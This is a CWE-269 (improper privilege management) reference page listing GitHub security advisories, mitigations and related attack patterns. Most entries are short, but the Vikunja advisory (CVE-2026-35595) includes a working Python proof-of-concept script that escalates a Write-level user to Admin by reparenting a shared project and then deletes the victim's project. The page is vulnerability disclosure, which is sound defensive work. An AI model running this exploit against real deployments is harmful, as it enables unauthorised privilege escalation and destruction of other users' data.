CWE-269
DiscouragedImproper Privilege Management
Abstraction: Class · Status: Draft
The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.
5455 vulnerabilities reference this CWE, most recent first.
GHSA-2V52-33CV-3WM5
Vulnerability from github – Published: 2022-05-13 01:52 – Updated: 2022-05-13 01:52An issue was discovered in certain Apple products. iOS before 11.3 is affected. macOS before 10.13.4 is affected. The issue involves the "Status Bar" component. It allows invisible microphone access via a crafted app.
{
"affected": [],
"aliases": [
"CVE-2018-4173"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-04-13T17:29:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in certain Apple products. iOS before 11.3 is affected. macOS before 10.13.4 is affected. The issue involves the \"Status Bar\" component. It allows invisible microphone access via a crafted app.",
"id": "GHSA-2v52-33cv-3wm5",
"modified": "2022-05-13T01:52:38Z",
"published": "2022-05-13T01:52:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-4173"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT208692"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT208693"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2V5G-963J-H7HV
Vulnerability from github – Published: 2025-06-17 15:31 – Updated: 2025-08-06 18:31Local Privilege escalation allows a low-privileged user to gain SYSTEM privileges in Citrix Secure Access Client for Windows
{
"affected": [],
"aliases": [
"CVE-2025-0320"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-17T14:15:30Z",
"severity": "HIGH"
},
"details": "Local Privilege escalation allows a low-privileged user to gain SYSTEM privileges in Citrix Secure Access Client for Windows",
"id": "GHSA-2v5g-963j-h7hv",
"modified": "2025-08-06T18:31:10Z",
"published": "2025-06-17T15:31:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0320"
},
{
"type": "WEB",
"url": "https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694724"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-2V6H-53V9-2VVC
Vulnerability from github – Published: 2024-06-04 15:30 – Updated: 2026-04-01 18:31Improper Privilege Management vulnerability in DeluxeThemes Userpro allows Privilege Escalation.This issue affects Userpro: from n/a through 5.1.8.
{
"affected": [],
"aliases": [
"CVE-2024-35700"
],
"database_specific": {
"cwe_ids": [
"CWE-266",
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-04T14:15:14Z",
"severity": "CRITICAL"
},
"details": "Improper Privilege Management vulnerability in DeluxeThemes Userpro allows Privilege Escalation.This issue affects Userpro: from n/a through 5.1.8.",
"id": "GHSA-2v6h-53v9-2vvc",
"modified": "2026-04-01T18:31:47Z",
"published": "2024-06-04T15:30:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35700"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/userpro/vulnerability/wordpress-userpro-plugin-5-1-8-unauthenticated-account-takeover-vulnerability?_s_id=cve"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/userpro/wordpress-userpro-plugin-5-1-8-unauthenticated-account-takeover-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2V7M-X9P5-QP96
Vulnerability from github – Published: 2025-08-20 18:30 – Updated: 2025-08-20 18:30There is an improper privilege management vulnerability identified in ManageEngine's Asset Explorer, ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus products by Zohocorp.
This vulnerability impacts Asset Explorer versions before 7710, ServiceDesk Plus versions before 15110, ServiceDesk Plus MSP versions before 14940, and SupportCenter Plus versions before 14940.
{
"affected": [],
"aliases": [
"CVE-2025-8309"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-20T17:15:37Z",
"severity": "HIGH"
},
"details": "There is an improper privilege management vulnerability identified in ManageEngine\u0027s Asset Explorer, ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus products by Zohocorp. \n\nThis vulnerability impacts Asset Explorer versions before 7710, ServiceDesk Plus versions before 15110, ServiceDesk Plus MSP versions before 14940, and SupportCenter Plus versions before 14940.",
"id": "GHSA-2v7m-x9p5-qp96",
"modified": "2025-08-20T18:30:22Z",
"published": "2025-08-20T18:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8309"
},
{
"type": "WEB",
"url": "https://www.manageengine.com/products/service-desk/cve-2025-8309.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2VGW-R373-M9QX
Vulnerability from github – Published: 2026-04-20 21:31 – Updated: 2026-04-21 21:31In OpenXiangShan NEMU, when Smstateen is enabled, clearing mstateen0.ENVCFG does not correctly restrict access to henvcfg and senvcfg. As a result, less-privileged code may read or write these CSRs without the required exception, potentially bypassing intended state-enable based isolation controls in virtualized or multi-privilege environments.
{
"affected": [],
"aliases": [
"CVE-2026-29648"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-20T21:16:19Z",
"severity": "HIGH"
},
"details": "In OpenXiangShan NEMU, when Smstateen is enabled, clearing mstateen0.ENVCFG does not correctly restrict access to henvcfg and senvcfg. As a result, less-privileged code may read or write these CSRs without the required exception, potentially bypassing intended state-enable based isolation controls in virtualized or multi-privilege environments.",
"id": "GHSA-2vgw-r373-m9qx",
"modified": "2026-04-21T21:31:22Z",
"published": "2026-04-20T21:31:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29648"
},
{
"type": "WEB",
"url": "https://github.com/OpenXiangShan/NEMU/issues/690"
},
{
"type": "WEB",
"url": "https://github.com/OpenXiangShan/XiangShan/pull/3978"
},
{
"type": "WEB",
"url": "https://docs.riscv.org/reference/isa/priv/smstateen.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2VJR-3244-HJ86
Vulnerability from github – Published: 2022-05-24 17:00 – Updated: 2022-05-24 17:00Insufficient access control in ilp60x64.sys driver for Intel(R) Ethernet 700 Series Controllers before version 1.33.0.0 may allow a privileged user to potentially enable escalation of privilege via local access.
{
"affected": [],
"aliases": [
"CVE-2019-0142"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-11-14T19:15:00Z",
"severity": "HIGH"
},
"details": "Insufficient access control in ilp60x64.sys driver for Intel(R) Ethernet 700 Series Controllers before version 1.33.0.0 may allow a privileged user to potentially enable escalation of privilege via local access.",
"id": "GHSA-2vjr-3244-hj86",
"modified": "2022-05-24T17:00:54Z",
"published": "2022-05-24T17:00:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0142"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00255.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-2VPJ-39CG-G8G7
Vulnerability from github – Published: 2022-07-13 00:00 – Updated: 2022-07-13 00:00Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22022, CVE-2022-22041, CVE-2022-30206.
{
"affected": [],
"aliases": [
"CVE-2022-30226"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-12T23:15:00Z",
"severity": "HIGH"
},
"details": "Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22022, CVE-2022-22041, CVE-2022-30206.",
"id": "GHSA-2vpj-39cg-g8g7",
"modified": "2022-07-13T00:00:39Z",
"published": "2022-07-13T00:00:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30226"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30226"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2VQ4-854F-5C72
Vulnerability from github – Published: 2026-04-10 15:33 – Updated: 2026-06-08 20:08Summary
A user with Write-level access to a project can escalate their permissions to Admin by moving the project under a project they own. After reparenting, the recursive permission CTE resolves ownership of the new parent as Admin on the moved project. The attacker can then delete the project, manage shares, and remove other users' access.
Details
The CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new parent project when changing parent_project_id. However, Vikunja's permission model uses a recursive CTE that walks up the project hierarchy to compute permissions. Moving a project under a different parent changes the permission inheritance chain.
When a user has inherited Write access (from a parent project share) and reparents the child project under their own project tree, the CTE resolves their ownership of the new parent as Admin (permission level 2) on the moved project.
if p.ParentProjectID != 0 && p.ParentProjectID != ol.ParentProjectID {
newProject := &Project{ID: p.ParentProjectID}
can, err := newProject.CanWrite(s, a) // Only checks Write, not Admin
if err != nil {
return false, err
}
if !can {
return false, ErrGenericForbidden{}
}
}
Proof of Concept
Tested on Vikunja v2.2.2.
1. victim creates "Parent Project" (id=3)
2. victim creates "Secret Child" (id=4) under Parent Project
3. victim shares Parent Project with attacker at Write level (permission=1)
-> attacker inherits Write on Secret Child (no direct share)
4. attacker creates own "Attacker Root" project (id=5)
5. attacker verifies: DELETE /api/v1/projects/4 -> 403 Forbidden
6. attacker sends: POST /api/v1/projects/4 {"title":"Secret Child","parent_project_id":5}
-> 200 OK (reparenting succeeds, only requires Write)
7. attacker sends: DELETE /api/v1/projects/4 -> 200 OK
-> Project deleted. victim gets 404.
import requests
TARGET = "http://localhost:3456"
API = f"{TARGET}/api/v1"
def login(u, p):
return requests.post(f"{API}/login", json={"username": u, "password": p}).json()["token"]
def h(token):
return {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
victim_token = login("victim", "Victim123!")
attacker_token = login("attacker", "Attacker123!")
# victim creates parent -> child project hierarchy
parent = requests.put(f"{API}/projects", headers=h(victim_token),
json={"title": "Parent Project"}).json()
child = requests.put(f"{API}/projects", headers=h(victim_token),
json={"title": "Secret Child", "parent_project_id": parent["id"]}).json()
# victim shares parent with attacker at Write (attacker inherits Write on child)
requests.put(f"{API}/projects/{parent['id']}/users", headers=h(victim_token),
json={"username": "attacker", "permission": 1})
# attacker creates own root project
own = requests.put(f"{API}/projects", headers=h(attacker_token),
json={"title": "Attacker Root"}).json()
# before: attacker cannot delete child
r = requests.delete(f"{API}/projects/{child['id']}", headers=h(attacker_token))
print(f"DELETE before reparent: {r.status_code}") # 403
# exploit: reparent child under attacker's project
r = requests.post(f"{API}/projects/{child['id']}", headers=h(attacker_token),
json={"title": "Secret Child", "parent_project_id": own["id"]})
print(f"Reparent: {r.status_code}") # 200
# after: attacker can now delete child
r = requests.delete(f"{API}/projects/{child['id']}", headers=h(attacker_token))
print(f"DELETE after reparent: {r.status_code}") # 200 - escalated to Admin
# victim lost access
r = requests.get(f"{API}/projects/{child['id']}", headers=h(victim_token))
print(f"Victim access: {r.status_code}") # 404 - project gone
Output:
DELETE before reparent: 403
Reparent: 200
DELETE after reparent: 200
Victim access: 404
The attacker escalated from inherited Write to Admin by reparenting, then deleted the victim's project.
Impact
Any user with Write permission on a shared project can escalate to full Admin by moving the project under their own project tree via a single API call. After escalation, the attacker can delete the project (destroying all tasks, attachments, and history), remove other users' access, and manage sharing settings. This affects any project where Write access has been shared with collaborators.
Recommended Fix
Require Admin permission instead of Write when changing parent_project_id:
if p.ParentProjectID != 0 && p.ParentProjectID != ol.ParentProjectID {
newProject := &Project{ID: p.ParentProjectID}
can, err := newProject.IsAdmin(s, a)
if err != nil {
return false, err
}
if !can {
return false, ErrGenericForbidden{}
}
canAdmin, err := p.IsAdmin(s, a)
if err != nil {
return false, err
}
if !canAdmin {
return false, ErrGenericForbidden{}
}
}
Found and reported by aisafe.io
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.2.2"
},
"package": {
"ecosystem": "Go",
"name": "code.vikunja.io/api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35595"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T15:33:50Z",
"nvd_published_at": "2026-04-10T17:17:02Z",
"severity": "HIGH"
},
"details": "## Summary\n\nA user with Write-level access to a project can escalate their permissions to Admin by moving the project under a project they own. After reparenting, the recursive permission CTE resolves ownership of the new parent as Admin on the moved project. The attacker can then delete the project, manage shares, and remove other users\u0027 access.\n\n## Details\n\nThe `CanUpdate` check at `pkg/models/project_permissions.go:139-148` only requires `CanWrite` on the new parent project when changing `parent_project_id`. However, Vikunja\u0027s permission model uses a recursive CTE that walks up the project hierarchy to compute permissions. Moving a project under a different parent changes the permission inheritance chain.\n\nWhen a user has inherited Write access (from a parent project share) and reparents the child project under their own project tree, the CTE resolves their ownership of the new parent as Admin (permission level 2) on the moved project.\n\n```go\nif p.ParentProjectID != 0 \u0026\u0026 p.ParentProjectID != ol.ParentProjectID {\n newProject := \u0026Project{ID: p.ParentProjectID}\n can, err := newProject.CanWrite(s, a) // Only checks Write, not Admin\n if err != nil {\n return false, err\n }\n if !can {\n return false, ErrGenericForbidden{}\n }\n}\n```\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2.\n\n```\n1. victim creates \"Parent Project\" (id=3)\n2. victim creates \"Secret Child\" (id=4) under Parent Project\n3. victim shares Parent Project with attacker at Write level (permission=1)\n -\u003e attacker inherits Write on Secret Child (no direct share)\n4. attacker creates own \"Attacker Root\" project (id=5)\n5. attacker verifies: DELETE /api/v1/projects/4 -\u003e 403 Forbidden\n6. attacker sends: POST /api/v1/projects/4 {\"title\":\"Secret Child\",\"parent_project_id\":5}\n -\u003e 200 OK (reparenting succeeds, only requires Write)\n7. attacker sends: DELETE /api/v1/projects/4 -\u003e 200 OK\n -\u003e Project deleted. victim gets 404.\n```\n\n```python \nimport requests \n \nTARGET = \"http://localhost:3456\" \nAPI = f\"{TARGET}/api/v1\" \n \ndef login(u, p): \n return requests.post(f\"{API}/login\", json={\"username\": u, \"password\": p}).json()[\"token\"]\n \ndef h(token): \n return {\"Authorization\": f\"Bearer {token}\", \"Content-Type\": \"application/json\"}\n \nvictim_token = login(\"victim\", \"Victim123!\")\nattacker_token = login(\"attacker\", \"Attacker123!\") \n \n# victim creates parent -\u003e child project hierarchy \nparent = requests.put(f\"{API}/projects\", headers=h(victim_token),\n json={\"title\": \"Parent Project\"}).json()\nchild = requests.put(f\"{API}/projects\", headers=h(victim_token),\n json={\"title\": \"Secret Child\", \"parent_project_id\": parent[\"id\"]}).json()\n\n# victim shares parent with attacker at Write (attacker inherits Write on child)\nrequests.put(f\"{API}/projects/{parent[\u0027id\u0027]}/users\", headers=h(victim_token),\n json={\"username\": \"attacker\", \"permission\": 1})\n\n# attacker creates own root project\nown = requests.put(f\"{API}/projects\", headers=h(attacker_token),\n json={\"title\": \"Attacker Root\"}).json()\n\n# before: attacker cannot delete child\nr = requests.delete(f\"{API}/projects/{child[\u0027id\u0027]}\", headers=h(attacker_token))\nprint(f\"DELETE before reparent: {r.status_code}\") # 403\n\n# exploit: reparent child under attacker\u0027s project\nr = requests.post(f\"{API}/projects/{child[\u0027id\u0027]}\", headers=h(attacker_token),\n json={\"title\": \"Secret Child\", \"parent_project_id\": own[\"id\"]})\nprint(f\"Reparent: {r.status_code}\") # 200\n\n# after: attacker can now delete child\nr = requests.delete(f\"{API}/projects/{child[\u0027id\u0027]}\", headers=h(attacker_token))\nprint(f\"DELETE after reparent: {r.status_code}\") # 200 - escalated to Admin\n\n# victim lost access\nr = requests.get(f\"{API}/projects/{child[\u0027id\u0027]}\", headers=h(victim_token))\nprint(f\"Victim access: {r.status_code}\") # 404 - project gone\n```\n\nOutput:\n```\nDELETE before reparent: 403\nReparent: 200\nDELETE after reparent: 200\nVictim access: 404\n```\n\nThe attacker escalated from inherited Write to Admin by reparenting, then deleted the victim\u0027s project.\n\n## Impact\n\nAny user with Write permission on a shared project can escalate to full Admin by moving the project under their own project tree via a single API call. After escalation, the attacker can delete the project (destroying all tasks, attachments, and history), remove other users\u0027 access, and manage sharing settings. This affects any project where Write access has been shared with collaborators.\n\n## Recommended Fix\n\nRequire Admin permission instead of Write when changing `parent_project_id`:\n\n```go\nif p.ParentProjectID != 0 \u0026\u0026 p.ParentProjectID != ol.ParentProjectID {\n newProject := \u0026Project{ID: p.ParentProjectID}\n can, err := newProject.IsAdmin(s, a)\n if err != nil {\n return false, err\n }\n if !can {\n return false, ErrGenericForbidden{}\n }\n canAdmin, err := p.IsAdmin(s, a)\n if err != nil {\n return false, err\n }\n if !canAdmin {\n return false, ErrGenericForbidden{}\n }\n}\n```\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
"id": "GHSA-2vq4-854f-5c72",
"modified": "2026-06-08T20:08:25Z",
"published": "2026-04-10T15:33:50Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2vq4-854f-5c72"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35595"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/pull/2583"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/commit/c03d682f48aff890eeb3c8b41d38226069722827"
},
{
"type": "PACKAGE",
"url": "https://github.com/go-vikunja/vikunja"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Vikunja vulnerable to Privilege Escalation via Project Reparenting"
}
GHSA-2VVP-RQVQ-VXV2
Vulnerability from github – Published: 2023-06-28 18:30 – Updated: 2024-04-04 05:14Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
{
"affected": [],
"aliases": [
"CVE-2021-31937"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-28T18:15:11Z",
"severity": "HIGH"
},
"details": "Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability",
"id": "GHSA-2vvp-rqvq-vxv2",
"modified": "2024-04-04T05:14:25Z",
"published": "2023-06-28T18:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31937"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31937"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2VWG-WM97-9XX9
Vulnerability from github – Published: 2022-05-24 17:38 – Updated: 2022-05-24 17:38An Incorrect Access Control issue was discovered in K7Computing K7AntiVirus Premium 15.01.00.53.
{
"affected": [],
"aliases": [
"CVE-2018-11008"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-01-11T16:15:00Z",
"severity": "MODERATE"
},
"details": "An Incorrect Access Control issue was discovered in K7Computing K7AntiVirus Premium 15.01.00.53.",
"id": "GHSA-2vwg-wm97-9xx9",
"modified": "2022-05-24T17:38:27Z",
"published": "2022-05-24T17:38:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11008"
},
{
"type": "WEB",
"url": "https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-6th-January-2021"
},
{
"type": "WEB",
"url": "https://www.k7computing.com"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation MIT-1
Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
Mitigation MIT-48
Strategy: Separation of Privilege
Follow the principle of least privilege when assigning access rights to entities in a software system.
Mitigation MIT-49
Strategy: Separation of Privilege
Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.
CAPEC-122: Privilege Abuse
An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.
CAPEC-233: Privilege Escalation
An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.
CAPEC-58: Restful Privilege Elevation
An adversary identifies a Rest HTTP (Get, Put, Delete) style permission method allowing them to perform various malicious actions upon server data due to lack of access control mechanisms implemented within the application service accepting HTTP messages.